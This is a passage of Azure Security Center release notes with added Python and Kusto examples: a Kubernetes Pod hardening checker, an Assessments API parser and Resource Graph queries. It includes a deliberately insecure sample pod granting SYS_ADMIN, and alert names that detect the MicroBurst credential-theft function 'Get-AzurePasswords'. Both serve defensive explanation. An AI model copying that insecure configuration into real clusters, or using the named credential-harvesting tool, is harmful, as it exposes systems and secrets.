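    name = meta.get("name", "<unnamed>")

    # 1. Default namespace: a manifest with no namespace lands in "default" too.
    if meta.get("namespace", "default") == "default":
        findings.append(f"{name}: uses the default namespace")

    # 2. Automounted API credentials. The Kubernetes default is true; the
    #    pod-level field overrides the service account's setting. This check
    #    assumes the service account itself has not disabled automounting,
    #    which cannot be seen from the Pod manifest alone.
    if spec.get("automountServiceAccountToken", True):
        findings.append(f"{name}: automounts the service account token")

    # 3. CAP_SYS_ADMIN (written SYS_ADMIN in securityContext.capabilities.add),
    #    or a privileged container, which implies every capability.
    for container in spec.get("containers", []) + spec.get("initContainers", []):
        cname = container.get("name", "<unnamed>")
        sc = container.get("securityContext", {})
        added = {cap.upper() for cap in sc.get("capabilities", {}).get("add", [])}
        if added & {"SYS_ADMIN", "CAP_SYS_ADMIN", "ALL"}:
            findings.append(f"{name}/{cname}: adds CAP_SYS_ADMIN")
        if sc.get("privileged"):
            findings.append(f"{name}/{cname}: runs privileged (implies CAP_SYS_ADMIN)")
    return findings


# Constructed sample: the weak form fails all three recommendations.
WEAK_POD = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "web"},  # no namespace -> default
    "spec": {
        "containers": [{
            "name": "app",
            "image": "registry.example.invalid/app:1.0",
            "securityContext": {"capabilities": {"add": ["NET_BIND_SERVICE", "SYS_ADMIN"]}},
        }],
    },
}

# Hardened form: own namespace, no token automount, only the one capability needed.
HARDENED_POD = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "web", "namespace": "web-frontend"},
    "spec": {
        "automountServiceAccountToken": False,
        "containers": [{
            "name": "app",
            "image": "registry.example.invalid/app:1.0",
            "securityContext": {
                "allowPrivilegeEscalation": False,
                "capabilities": {"drop": ["ALL"], "add": ["NET_BIND_SERVICE"]},
            },
        }],
    },
}

if __name__ == "__main__":
    for label, pod in (("weak", WEAK_POD), ("hardened", HARDENED_POD)):
        print(label, check_pod(pod) or "OK")
```

Running the weak manifest yields three findings and the hardened one none; the hardened form also drops all capabilities before adding back the single one the workload needs, which is the usual way to keep CAP_SYS_ADMIN out even when an image's defaults change.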


Assessments API expanded with two new fields

We've added the following two fields to the Assessments REST API:

• FirstEvaluationDate - The time that the recommendation was created and first evaluated. Returned as UTC time in ISO 8601 format.
• StatusChangeDate - The time that the status of the recommendation last changed. Returned as UTC time in ISO 8601 format.

The initial default value for these fields - for all recommendations - is 2021-03-14T00:00:00+0000000Z.


To access this information, you can use any of the methods below.

REST API call: GET https://management.azure.com/subscriptions/<SUBSCRIPTION_ID>/providers/Microsoft.Security/assessments?api-version=2019-01-01-preview&$expand=statusEvaluationDates

Azure Resource Graph: securityresources | where type == "microsoft.security/assessments"

Continuous export: The two dedicated fields will be available in the Log Analytics workspace data.

CSV export: The two fields are included in the CSV files.


Learn more about the Assessments REST API. 
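The two new fields make it possible to measure how long a recommendation has been unhealthy, provided the initial default value above is treated as "not yet observed" rather than as a real timestamp. The following Python is an added example, not Microsoft code: it parses a constructed, trimmed version of what the REST call with $expand=statusEvaluationDates returns and ranks unhealthy assessments by time in that state. The placement of the two fields under properties.status is an assumption about the API's response shape, and the assessment keys, resource ID and dates are made up.

```python
"""Rank unhealthy assessments by how long they have been unhealthy.

Added example, not Microsoft code. SAMPLE_RESPONSE is a constructed, trimmed
version of an Assessments API response with $expand=statusEvaluationDates; the
placement of the two date fields under properties.status is assumed.
"""
from __future__ import annotations

from datetime import datetime, timezone

# The initial default the release note gives for both fields. It means "never
# observed", not a real instant, so it is mapped to None below.
INITIAL_DEFAULT = "2021-03-14T00:00:00+0000000Z"


def parse_date(value: str | None) -> datetime | None:
    """Parse an ISO 8601 UTC timestamp, tolerating a trailing Z and a 7-digit fraction."""
    if not value or value == INITIAL_DEFAULT:
        return None
    v = value[:-1] + "+00:00" if value.endswith("Z") else value
    if "." in v:
        base, frac_and_tz = v.split(".", 1)
        sign = max(frac_and_tz.rfind("+"), frac_and_tz.rfind("-"))
        frac, tz = (frac_and_tz[:sign], frac_and_tz[sign:]) if sign > 0 else (frac_and_tz, "")
        v = f"{base}.{frac[:6].ljust(6, '0')}{tz}"  # fromisoformat accepts at most 6 digits
    dt = datetime.fromisoformat(v)
    return dt if dt.tzinfo else dt.replace(tzinfo=timezone.utc)


def summarize(assessments: list[dict], now: datetime) -> list[dict]:
    """Return the unhealthy assessments, longest-unhealthy first.

    daysUnhealthy/daysKnown are None when the field still holds the initial default.
    """
    rows = []
    for a in assessments:
        props = a.get("properties", {})
        status = props.get("status", {})
        if status.get("code") != "Unhealthy":
            continue
        changed = parse_date(status.get("statusChangeDate"))
        first = parse_date(status.get("firstEvaluationDate"))
        rows.append({
            "name": a["name"],
            "displayName": props.get("displayName"),
            "resourceId": props.get("resourceDetails", {}).get("Id"),
            "daysUnhealthy": (now - changed).days if changed else None,
            "daysKnown": (now - first).days if first else None,
        })
    # Unknown durations sort last.
    return sorted(rows, key=lambda r: -(r["daysUnhealthy"] if r["daysUnhealthy"] is not None else -1))


# Constructed sample response (placeholder assessment keys and resource ID).
SAMPLE_RESPONSE = {"value": [
    {"name": "00000000-0000-0000-0000-000000000001",
     "properties": {"displayName": "Disk encryption should be applied on virtual machines",
                    "resourceDetails": {"Source": "Azure",
                                        "Id": "/subscriptions/<SUBSCRIPTION_ID>/resourceGroups/rg1/providers/Microsoft.Compute/virtualMachines/vm1"},
                    "status": {"code": "Unhealthy",
                               "firstEvaluationDate": "2021-03-20T09:00:00.0000000Z",
                               "statusChangeDate": "2021-05-01T12:30:00.0000000Z"}}},
    {"name": "00000000-0000-0000-0000-000000000002",
     "properties": {"displayName": "Management ports should be closed on your virtual machines",
                    "status": {"code": "Unhealthy",
                               "firstEvaluationDate": INITIAL_DEFAULT,
                               "statusChangeDate": INITIAL_DEFAULT}}},
    {"name": "00000000-0000-0000-0000-000000000003",
     "properties": {"displayName": "System updates should be installed on your machines",
                    "status": {"code": "Healthy",
                               "firstEvaluationDate": "2021-03-20T09:00:00.0000000Z",
                               "statusChangeDate": "2021-04-02T00:00:00.0000000Z"}}},
]}

if __name__ == "__main__":
    for row in summarize(SAMPLE_RESPONSE["value"], datetime.now(timezone.utc)):
        print(row["daysUnhealthy"], row["displayName"], row["resourceId"])
```

Keeping the sentinel check in one place (parse_date) is deliberate: any report that subtracts the default value from "now" would otherwise show every never-evaluated recommendation as unhealthy since March 2021.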


Asset inventory gets a cloud environment filter 


Security Center's asset inventory page offers many filters to quickly refine the list of resources displayed. Learn more in Explore and manage your resources with asset inventory.

A new filter offers the option to refine the list according to the cloud accounts you've connected with Security Center's multicloud features:


[Screenshot: the Inventory page with the new Environment filter opened, offering the values Azure, AWS and GCP with their resource counts, above the resource list (name, resource type, subscription, monitoring status).]


Learn more about the multicloud capabilities: 


• Connect your AWS accounts to Azure Security Center
• Connect your GCP projects to Azure Security Center


April 2021 


Updates in April include: 


• Refreshed resource health page (in preview)
• Container registry images that have been recently pulled are now rescanned weekly (released for general availability (GA))
• Use Azure Defender for Kubernetes to protect hybrid and multicloud Kubernetes deployments (in preview)
• Microsoft Defender for Endpoint integration with Azure Defender now supports Windows Server 2019 and Windows 10 on Windows Virtual Desktop released for general availability (GA)
• Recommendations to enable Azure Defender for DNS and Resource Manager (in preview)
• Three regulatory compliance standards added: Azure CIS 1.3.0, CMMC Level 3, and New Zealand ISM Restricted
• Four new recommendations related to guest configuration (in preview)
• CMK recommendations moved to best practices security control
• 11 Azure Defender alerts deprecated
• Two recommendations from "Apply system updates" security control were deprecated
• Azure Defender for SQL on machine tile removed from Azure Defender dashboard
• 21 recommendations moved between security controls


Refreshed resource health page (in preview) 


Security Center's resource health has been expanded, enhanced, and improved to provide a snapshot 
view of the overall health of a single resource. 


You can review detailed information about the resource and all recommendations that apply to that 
resource. Also, if you're using the advanced protection plans of Microsoft Defender, you can see 
outstanding security alerts for that specific resource too. 


To open the resource health page for a resource, select any resource from the asset inventory page. 
This preview page in Security Center's portal pages shows: 


1. Resource information - The resource group and subscription it's attached to, the geographic location, and more.
2. Applied security feature - Whether Azure Defender is enabled for the resource.
3. Counts of outstanding recommendations and alerts - The number of outstanding security recommendations and Azure Defender alerts.
4. Actionable recommendations and alerts - Two tabs list the recommendations and alerts that apply to the resource.


[Screenshot: the resource health page for a virtual machine, with the resource information and monitoring status on the left and the Recommendations and Alerts tabs on the right; the Recommendations tab lists each recommendation's severity, description and status (Unhealthy or Healthy).]


Learn more in Tutorial: Investigate the health of your resources. 


Container registry images that have been recently pulled are now 
rescanned weekly (released for general availability (GA)) 


Azure Defender for container registries includes a built-in vulnerability scanner. This scanner 
immediately scans any image you push to your registry and any image pulled within the last 30 days. 


New vulnerabilities are discovered every day. With this update, container images that were pulled from 
your registries during the last 30 days will be rescanned every week. This ensures that newly 
discovered vulnerabilities are identified in your images. 


Scanning is charged on a per image basis, so there's no additional charge for these rescans. 


Learn more about this scanner in Use Azure Defender for container registries to scan your images for vulnerabilities.


Use Azure Defender for Kubernetes to protect hybrid and 
multicloud Kubernetes deployments (in preview) 


Azure Defender for Kubernetes is expanding its threat protection capabilities to defend your clusters wherever they're deployed. This has been enabled by integrating with Azure Arc-enabled Kubernetes and its new extensions capabilities.


When you've enabled Azure Arc on your non-Azure Kubernetes clusters, a new recommendation from 
Azure Security Center offers to deploy the Azure Defender agent to them with only a few clicks. 


Use the recommendation (Azure Arc-enabled Kubernetes clusters should have Azure Defender's 
extension installed) and the extension to protect Kubernetes clusters deployed in other cloud 
providers, although not on their managed Kubernetes services. 


This integration between Azure Security Center, Azure Defender, and Azure Arc-enabled Kubernetes brings:

• Easy provisioning of the Azure Defender agent to unprotected Azure Arc-enabled Kubernetes clusters (manually and at-scale)
• Monitoring of the Azure Defender agent and its provisioning state from the Azure Arc Portal
• Security recommendations from Security Center are reported in the new Security page of the Azure Arc Portal
• Identified security threats from Azure Defender are reported in the new Security page of the Azure Arc Portal
• Azure Arc-enabled Kubernetes clusters are integrated into the Azure Security Center platform and experience

Learn more in Use Azure Defender for Kubernetes with your on-premises and multicloud Kubernetes clusters.


[Screenshot: the Recommendations page filtered on "defender for kubern", showing the "Azure Arc enabled Kubernetes clusters should have Microsoft Defender's extension enabled" recommendation under the Enable Azure Defender control, with 5 of 18 managed clusters unhealthy.]


Microsoft Defender for Endpoint integration with Azure Defender 
now supports Windows Server 2019 and Windows 10 on Windows 
Virtual Desktop released for general availability (GA) 


Microsoft Defender for Endpoint is a holistic, cloud delivered endpoint security solution. It provides risk-based vulnerability management and assessment as well as endpoint detection and response (EDR). For a full list of the benefits of using Defender for Endpoint together with Azure Security Center, see Protect your endpoints with Security Center's integrated EDR solution: Microsoft Defender for Endpoint.

When you enable Azure Defender for Servers running Windows Server, a license for Defender for Endpoint is included with the plan. If you've already enabled Azure Defender for Servers and you have Windows Server 2019 servers in your subscription, they'll automatically receive Defender for Endpoint with this update. No manual action is required.

Support has now been expanded to include Windows Server 2019 and Windows 10 on Windows Virtual Desktop.


Note

If you're enabling Defender for Endpoint on a Windows Server 2019 server, ensure it meets the prerequisites described in Enable the Microsoft Defender for Endpoint integration.


Recommendations to enable Azure Defender for DNS and Resource 
Manager (in preview) 


Two new recommendations have been added to simplify the process of enabling Azure Defender for Resource Manager and Azure Defender for DNS:

• Azure Defender for Resource Manager should be enabled - Defender for Resource Manager automatically monitors the resource management operations in your organization. Azure Defender detects threats and alerts you about suspicious activity.
• Azure Defender for DNS should be enabled - Defender for DNS provides an additional layer of protection for your cloud resources by continuously monitoring all DNS queries from your Azure resources. Azure Defender alerts you about suspicious activity at the DNS layer.

Enabling Azure Defender plans results in charges. Learn about the pricing details per region on Security Center's pricing page.


Tip

Preview recommendations don't render a resource unhealthy, and they aren't included in the calculations of your secure score. Remediate them wherever possible, so that when the preview period ends they'll contribute towards your score. Learn more about how to respond to these recommendations in Remediate recommendations in Azure Security Center.


Three regulatory compliance standards added: Azure CIS 1.3.0, 
CMMC Level 3, and New Zealand ISM Restricted 


We've added three standards for use with Azure Security Center. Using the regulatory compliance 
dashboard, you can now track your compliance with: 


• CIS Microsoft Azure Foundations Benchmark 1.3.0
• CMMC Level 3
• New Zealand ISM Restricted


You can assign these to your subscriptions as described in Customize the set of standards in your 
regulatory compliance dashboard. 


[Screenshot: the "Add regulatory compliance standards" pane (Dashboard > Microsoft Defender for Cloud > Security policy). It lists standards such as NIST SP 800-53 R4, NIST SP 800-171 R2, UK OFFICIAL and UK NHS, Canada Federal PBMM, Azure CIS 1.1.0, HIPAA HITRUST, SWIFT CSP CSCF v2020, ISO 27001:2013, New Zealand ISM Restricted, CMMC Level 3 and Azure CIS 1.3.0, each with an Add button for assigning it to the subscription.]


Learn more in: 


• Customize the set of standards in your regulatory compliance dashboard
• Tutorial: Improve your regulatory compliance
• FAQ - Regulatory compliance dashboard


Four new recommendations related to guest configuration (in 
preview) 


Azure's Guest Configuration extension reports to Security Center to help ensure your virtual machines' in-guest settings are hardened. The extension isn't required for Arc-enabled servers because it's included in the Arc Connected Machine agent. The extension requires a system-managed identity on the machine.

We've added four new recommendations to Security Center to make the most of this extension.

• Two recommendations prompt you to install the extension and its required system-managed identity:

  ◦ Guest Configuration extension should be installed on your machines
  ◦ Virtual machines' Guest Configuration extension should be deployed with system-assigned managed identity

• When the extension is installed and running, it will begin auditing your machines and you'll be prompted to harden settings such as configuration of the operating system and environment settings. These two recommendations will prompt you to harden your Windows and Linux machines as described:

  ◦ Windows Defender Exploit Guard should be enabled on your machines
  ◦ Authentication to Linux machines should require SSH keys


Learn more in Understand Azure Policy's Guest Configuration. 


CMK recommendations moved to best practices security control 


Every organization's security program includes data encryption requirements. By default, Azure 
customers’ data is encrypted at rest with service-managed keys. However, customer-managed keys 
(CMK) are commonly required to meet regulatory compliance standards. CMKs let you encrypt your 
data with an Azure Key Vault key created and owned by you. This gives you full control and 
responsibility for the key lifecycle, including rotation and management. 


Azure Security Center's security controls are logical groups of related security recommendations, and 
reflect your vulnerable attack surfaces. Each control has a maximum number of points you can add to 
your secure score if you remediate all of the recommendations listed in the control, for all of your 
resources. The Implement security best practices security control is worth zero points. So 
recommendations in this control don't affect your secure score. 


The recommendations listed below are being moved to the Implement security best practices security control to better reflect their optional nature. This move ensures that these recommendations are in the most appropriate control to meet their objective.

• Azure Cosmos DB accounts should use customer-managed keys to encrypt data at rest
• Azure Machine Learning workspaces should be encrypted with a customer-managed key (CMK)
• Azure AI services accounts should enable data encryption with a customer-managed key (CMK)
• Container registries should be encrypted with a customer-managed key (CMK)
• SQL managed instances should use customer-managed keys to encrypt data at rest
• SQL servers should use customer-managed keys to encrypt data at rest
• Storage accounts should use customer-managed key (CMK) for encryption


Learn which recommendations are in each security control in Security controls and their recommendations.


11 Azure Defender alerts deprecated 


The 11 Azure Defender alerts listed below have been deprecated.

• New alerts will replace these two alerts and provide better coverage:

  AlertType                  AlertDisplayName
  ARM_MicroBurstDomainInfo   PREVIEW - MicroBurst toolkit "Get-AzureDomainInfo" function run detected
  ARM_MicroBurstRunbook      PREVIEW - MicroBurst toolkit "Get-AzurePasswords" function run detected

• These nine alerts relate to an Azure Active Directory Identity Protection connector (IPC) that has already been deprecated:

  AlertType             AlertDisplayName
  UnfamiliarLocation    Unfamiliar sign-in properties
  AnonymousLogin        Anonymous IP address
  InfectedDeviceLogin   Malware linked IP address
  ImpossibleTravel      Atypical travel
  MaliciousIP           Malicious IP address
  LeakedCredentials     Leaked credentials
  PasswordSpray         Password Spray
  LeakedCredentials     Azure AD threat intelligence
  AADAI                 Azure AD AI

Tip


These nine IPC alerts were never Security Center alerts. They're part of the Azure Active 
Directory (AAD) Identity Protection connector (IPC) that was sending them to Security 
Center. For the last two years, the only customers who've been seeing those alerts are 
organizations who configured the export (from the connector to ASC) in 2019 or earlier. AAD 
IPC has continued to show them in its own alerts systems and they've continued to be 
available in Azure Sentinel. The only change is that they're no longer appearing in Security 
Center. 


Two recommendations from "Apply system updates" security control were deprecated

The following two recommendations were deprecated and the changes might result in a slight impact on your secure score:

• Your machines should be restarted to apply system updates
• Monitoring agent should be installed on your machines. This recommendation relates to on-premises machines only and some of its logic will be transferred to another recommendation, Log Analytics agent health issues should be resolved on your machines

We recommend checking your continuous export and workflow automation configurations to see whether these recommendations are included in them. Also, any dashboards or other monitoring tools that might be using them should be updated accordingly.


Learn more about these recommendations in the security recommendations reference page. 


Azure Defender for SQL on machine tile removed from Azure 
Defender dashboard 


The Azure Defender dashboard's coverage area includes tiles for the relevant Azure Defender plans for 
your environment. Due to an issue with the reporting of the numbers of protected and unprotected 
resources, we've decided to temporarily remove the resource coverage status for Azure Defender for 
SQL on machines until the issue is resolved. 


21 recommendations moved between security controls 


The following recommendations were moved to different security controls. Security controls are logical 
groups of related security recommendations, and reflect your vulnerable attack surfaces. This move 
ensures that each of these recommendations is in the most appropriate control to meet its objective. 


Learn which recommendations are in each security control in Security controls and their recommendations.

Recommendations moving from Remediate vulnerabilities (worth 6 points) to Remediate security configurations (worth 4 points). Depending on your environment, these recommendations will have a reduced impact on your score:

• Vulnerability assessment should be enabled on your SQL servers
• Vulnerability assessment should be enabled on your SQL managed instances
• Vulnerabilities on your SQL databases should be remediated (new)
• Vulnerabilities on your SQL databases in VMs should be remediated

Recommendations moving to Implement security best practices. When a recommendation moves to the Implement security best practices security control, which is worth no points, the recommendation no longer affects your secure score:

• There should be more than one owner assigned to your subscription
• Automation account variables should be encrypted
• IoT Devices - Auditd process stopped sending events
• IoT Devices - Operating system baseline validation failure
• IoT Devices - TLS cipher suite upgrade needed
• IoT Devices - Open Ports On Device
• IoT Devices - Permissive firewall policy in one of the chains was found
• IoT Devices - Permissive firewall rule in the input chain was found
• IoT Devices - Permissive firewall rule in the output chain was found
• Diagnostic logs in IoT Hub should be enabled
• IoT Devices - Agent sending underutilized messages
• IoT Devices - Default IP Filter Policy should be Deny
• IoT Devices - IP Filter rule large IP range
• IoT Devices - Agent message intervals and size should be adjusted
• IoT Devices - Identical Authentication Credentials
• IoT Devices - Audited process stopped sending events
• IoT Devices - Operating system (OS) baseline configuration should be fixed


March 2021 


Updates in March include: 


• Azure Firewall management integrated into Security Center
• SQL vulnerability assessment now includes the "Disable rule" experience (preview)
• Azure Monitor Workbooks integrated into Security Center and three templates provided
• Regulatory compliance dashboard now includes Azure Audit reports (preview)
• Recommendation data can be viewed in Azure Resource Graph with "Explore in ARG"
• Updates to the policies for deploying workflow automation
• Two legacy recommendations no longer write data directly to Azure activity log
• Recommendations page enhancements


Azure Firewall management integrated into Security Center 


When you open Azure Security Center, the first page to appear is the overview page. 


This interactive dashboard provides a unified view into the security posture of your hybrid cloud 
workloads. Additionally, it shows security alerts, coverage information, and more. 


As part of helping you view your security status from a central experience, we have integrated the 
Azure Firewall Manager into this dashboard. You can now check Firewall coverage status across all 
networks and centrally manage Azure Firewall policies starting from Security Center. 


Learn more about this dashboard in Azure Security Center's overview page. 
[Screenshot: the Security Center overview page with the integrated Azure Firewall Manager tiles (Firewalls, Firewall policies, Regions with firewalls, Virtual hubs, Virtual networks), shown alongside alerts by severity, network protection status and the "Controls with the highest potential increase" list (Remediate vulnerabilities, Enable encryption at rest, Secure management ports).]


SQL vulnerability assessment now includes the "Disable rule" 
experience (preview) 


Security Center includes a built-in vulnerability scanner to help you discover, track, and remediate 
potential database vulnerabilities. The results from your assessment scans provide an overview of your 
SQL machines' security state, and details of any security findings. 


If you have an organizational need to ignore a finding, rather than remediate it, you can optionally 
disable it. Disabled findings don't impact your secure score or generate unwanted noise. 


Learn more in Disable specific findings. 


Azure Monitor Workbooks integrated into Security Center and 
three templates provided 


As part of Ignite Spring 2021, we announced an integrated Azure Monitor Workbooks experience in 
Security Center. 


You can use the new integration to start using the out-of-the-box templates from Security Center's 
gallery. By using workbook templates, you can access and build dynamic and visual reports to track 
your organization's security posture. Additionally, you can create new workbooks based on Security 
Center data or any other supported data types and quickly deploy community workbooks from 
Security Center's GitHub community. 


Three template reports are provided:

• Secure Score Over Time - Track your subscriptions' scores and changes to recommendations for your resources
• System Updates - View missing system updates by resources, OS, severity, and more
• Vulnerability Assessment Findings - View the findings of vulnerability scans of your Azure resources


Learn about using these reports or building your own in Create rich, interactive reports of Security 
Center data. 


[Screenshot: the Secure Score Over Time workbook, showing the top recommendations with a recent increase in unhealthy resources and a chart of security control scores over time (weekly).]


Regulatory compliance dashboard now includes Azure Audit 
reports (preview) 


From the regulatory compliance dashboard's toolbar, you can now download Azure and Dynamics certification reports.

[Screenshot: the Regulatory compliance toolbar with the Download report, Manage compliance policies, Open query, Compliance over time workbook and Audit reports buttons.]


You can select the tab for the relevant reports types (PCI, SOC, ISO, and others) and use filters to find 
the specific reports you need. 


Learn more about Managing the standards in your regulatory compliance dashboard. 


[Screenshot: the Audit reports (Preview) pane with tabs for ISO, SOC, PCI, HITRUST, US Government and Industry & Regional reports, listing downloadable Microsoft Azure, Dynamics 365 and Online Services assessment reports and certificates (ISO 27001, 27017, 27018, 27701) filtered by region, industry and standard.]

Recommendation data can be viewed in Azure Resource Graph with "Explore in ARG"


The recommendation details pages now include the "Explore in ARG" toolbar button. Use this button 
to open an Azure Resource Graph query and explore, export, and share the recommendation's data. 


Azure Resource Graph (ARG) provides instant access to resource information across your cloud environments with robust filtering, grouping, and sorting capabilities. It's a quick and efficient way to query information across Azure subscriptions programmatically or from within the Azure portal.


Learn more about Azure Resource Graph (ARG). 


[Screenshot: the details page of the recommendation "Microsoft Defender for SQL should be enabled on your SQL servers", with the Exempt, Enforce, View policy definition and Explore in ARG toolbar buttons, severity High, freshness interval 30 minutes, and the Unhealthy resources (11), Healthy resources (42), Exempted resources and Not applicable resources (2) tabs.]
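As an added example (not a query from the Security Center documentation), this is the kind of Azure Resource Graph query that "Explore in ARG" opens, extended to count unhealthy resources per subscription. It reads Security Center assessments from the securityresources table; the recommendation display name is taken from the screenshot above and is the only assumed value.

```kusto
// Added example, not from the original page: query Security Center assessment
// data (securityresources, type microsoft.security/assessments) in Azure Resource Graph.
// Select the recommendation by its display name, as shown in the portal.
let recommendation = "Microsoft Defender for SQL should be enabled on your SQL servers";
securityresources
| where type == "microsoft.security/assessments"
// Flatten the assessment properties that the recommendation details page displays.
| extend displayName = tostring(properties.displayName),
         statusCode  = tostring(properties.status.code),       // Healthy, Unhealthy, NotApplicable
         statusCause = tostring(properties.status.cause),      // e.g. Exempt when an exemption applies
         severity    = tostring(properties.metadata.severity),
         resourceId  = tostring(properties.resourceDetails.Id)
| where displayName == recommendation
// Keep only resources that currently fail the check; exempted resources are not reported as Unhealthy.
| where statusCode == "Unhealthy"
// One row per subscription, with a few affected resource IDs for triage.
| summarize unhealthyCount = count(), sampleResources = make_set(resourceId, 5)
    by subscriptionId, displayName, severity
| order by unhealthyCount desc
```

Drop the final summarize to export the full per-resource list, which is what the "Explore in ARG" button shows by default.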


Updates to the policies for deploying workflow automation 


Automating your organization's monitoring and incident response processes can greatly improve the time it takes to investigate and mitigate security incidents.

We provide three Azure Policy 'DeployIfNotExist' policies that create and configure workflow automation procedures so that you can deploy your automations across your organization:

Goal: Workflow automation for security alerts
Policy: Deploy Workflow Automation for Azure Security Center alerts
Policy ID: f1525828-9a90-4fcf-be48-268cdd02361e

Goal: Workflow automation for security recommendations
Policy: Deploy Workflow Automation for Azure Security Center recommendations
Policy ID: 73d6ab6c-2475-4850-afd6-43795f3492ef

Goal: Workflow automation for regulatory compliance changes
Policy: Deploy Workflow Automation for Azure Security Center regulatory compliance
Policy ID: 509122b9-ddd9-47ba-a5f1-d0dac20be63c

There are two updates to the features of these policies:

• When assigned, they will remain enabled by enforcement.

• You can now customize these policies and update any of the parameters even after they have already been deployed. For example, if a user wants to add another assessment key, or edit an existing assessment key, they can do so.

Get started with workflow automation templates.


Learn more about how to Automate responses to Security Center triggers. 


Two legacy recommendations no longer write data directly to 
Azure activity log 


Security Center passes the data for almost all security recommendations to Azure Advisor, which in turn writes it to Azure activity log.

For two recommendations, the data is simultaneously written directly to Azure activity log. With this change, Security Center stops writing data for these legacy security recommendations directly to activity log. Instead, we're exporting the data to Azure Advisor as we do for all the other recommendations.

The two legacy recommendations are:

• Endpoint protection health issues should be resolved on your machines
• Vulnerabilities in security configuration on your machines should be remediated

If you've been accessing information for these two recommendations in activity log's "Recommendation of type TaskDiscovery" category, this is no longer available.


Recommendations page enhancements 


We've released an improved version of the recommendations list to present more information at a glance.

Now on the page you'll see:

1. The maximum score and current score for each security control.

2. Icons replacing tags such as Fix and Preview.

3. A new column showing the Policy initiative related to each recommendation - visible when "Group by controls" is disabled.


[Screenshot: the redesigned recommendations list. Grouped by controls, each control shows its max score, current score, potential score increase, unhealthy resources, resource health and actions; with grouping disabled, the new Initiative column lists the related policy initiatives (for example ASB, Azure CIS 1.1.0, Canada Fed PBMM, Guest config policies).]


Learn more in Security recommendations in Azure Security Center. 


February 2021 


Updates in February include: 


• New security alerts page in the Azure portal released for general availability (GA)
• Kubernetes workload protection recommendations released for general availability (GA)
• Microsoft Defender for Endpoint integration with Azure Defender now supports Windows Server 2019 and Windows 10 on Windows Virtual Desktop (in preview)
• Direct link to policy from recommendation details page
• SQL data classification recommendation no longer affects your secure score
• Workflow automations can be triggered by changes to regulatory compliance assessments (in preview)
• Asset inventory page enhancements


New security alerts page in the Azure portal released for general 
availability (GA) 


Azure Security Center's security alerts page has been redesigned to provide: 


• Improved triage experience for alerts - helping to reduce alert fatigue and focus on the most relevant threats more easily, the list includes customizable filters and grouping options.

• More information in the alerts list - such as MITRE ATT&CK tactics.

• Button to create sample alerts - to evaluate Azure Defender capabilities and test your alerts configuration (for SIEM integration, email notifications, and workflow automations), you can create sample alerts from all Azure Defender plans.

• Alignment with Azure Sentinel's incident experience - for customers who use both products, switching between them is now a more straightforward experience and it's easy to learn one from the other.

• Better performance for large alerts lists.

• Keyboard navigation through the alert list.

• Alerts from Azure Resource Graph - you can query alerts in Azure Resource Graph, the Kusto-like API for all of your resources. This is also useful if you're building your own alerts dashboards. Learn more about Azure Resource Graph.

• Create sample alerts feature - To create sample alerts from the new alerts experience, see Generate sample Azure Defender alerts.


[Screenshot: the redesigned Security alerts page, with active alerts summarized by severity (High, Medium, Low), filters for status, severity and time, a grouping selector, a MITRE ATT&CK tactics column, and the Open query, Suppression rules, Security alerts map (Preview) and Create sample alerts toolbar buttons.]
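As an added example (not from the original page), the following Azure Resource Graph query is a starting point for the custom alerts dashboard the list item above mentions: it reads Security Center alerts from the securityresources table and summarizes the active alerts of the last month by severity and MITRE ATT&CK tactic, the same columns the redesigned alerts page shows.

```kusto
// Added example, not from the original page: query Security Center alerts
// (securityresources, type microsoft.security/locations/alerts) in Azure Resource Graph.
securityresources
| where type == "microsoft.security/locations/alerts"
// Flatten the alert properties shown in the portal's alerts list.
| extend alertName = tostring(properties.alertDisplayName),
         severity  = tostring(properties.severity),          // Low, Medium, High
         status    = tostring(properties.status),            // Active, Dismissed, Resolved
         tactics   = tostring(properties.intent),            // MITRE ATT&CK tactic(s), e.g. CredentialAccess
         entity    = tostring(properties.compromisedEntity), // affected resource
         startTime = todatetime(properties.startTimeUtc)
// Same scope as the portal's default view: active alerts from the last month.
| where status == "Active" and startTime > ago(30d)
// Rank severities so High sorts first instead of alphabetically.
| extend severityRank = case(severity == "High", 0, severity == "Medium", 1, 2)
| summarize alerts = count(), affectedResources = dcount(entity)
    by severityRank, severity, tactics
| order by severityRank asc, alerts desc
| project severity, tactics, alerts, affectedResources
```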
Kubernetes workload protection recommendations released for
general availability (GA) 


We're happy to announce the general availability (GA) of the set of recommendations for Kubernetes workload protections.


To ensure that Kubernetes workloads are secure by default, Security Center has added Kubernetes level 
hardening recommendations, including enforcement options with Kubernetes admission control. 


When Azure Policy for Kubernetes is installed on your Azure Kubernetes Service (AKS) cluster, every 
request to the Kubernetes API server will be monitored against the predefined set of best practices - 
displayed as 13 security recommendations - before being persisted to the cluster. You can then 
configure to enforce the best practices and mandate them for future workloads. 


For example, you can mandate that privileged containers shouldn't be created, and any future requests 
to do so will be blocked. 


Learn more in Workload protection best-practices using Kubernetes admission control. 


Note

While the recommendations were in preview, they didn't render an AKS cluster resource unhealthy, and they weren't included in the calculations of your secure score. With this GA announcement these will be included in the score calculation. If you haven't remediated them already, this might result in a slight impact on your secure score. Remediate them wherever possible as described in Remediate recommendations in Azure Security Center.


Microsoft Defender for Endpoint integration with Azure Defender 
now supports Windows Server 2019 and Windows 10 on Windows 
Virtual Desktop (in preview) 


Microsoft Defender for Endpoint is a holistic, cloud delivered endpoint security solution. It provides risk-based vulnerability management and assessment as well as endpoint detection and response (EDR). For a full list of the benefits of using Defender for Endpoint together with Azure Security Center, see Protect your endpoints with Security Center's integrated EDR solution: Microsoft Defender for Endpoint.

When you enable Azure Defender for Servers running Windows Server, a license for Defender for Endpoint is included with the plan. If you've already enabled Azure Defender for Servers and you have Windows Server 2019 servers in your subscription, they'll automatically receive Defender for Endpoint with this update. No manual action is required.

Support has now been expanded to include Windows Server 2019 and Windows 10 on Windows Virtual Desktop.

Note

If you're enabling Defender for Endpoint on a Windows Server 2019 server, ensure it meets the prerequisites described in Enable the Microsoft Defender for Endpoint integration.


Direct link to policy from recommendation details page 


When you're reviewing the details of a recommendation, it's often helpful to be able to see the underlying policy. For every recommendation supported by a policy, there's a new link from the recommendation details page:


[Screenshot: the details page of "Management ports should be closed on your virtual machines", with the new "View policy definition" link next to Exempt, severity Medium, freshness interval 24 hours, and the Unhealthy resources (25), Healthy resources (121) and Not applicable resources (42) tabs.]


Use this link to view the policy definition and review the evaluation logic. 


If you're reviewing the list of recommendations on our Security recommendations reference guide, you'll also see links to the policy definition pages:

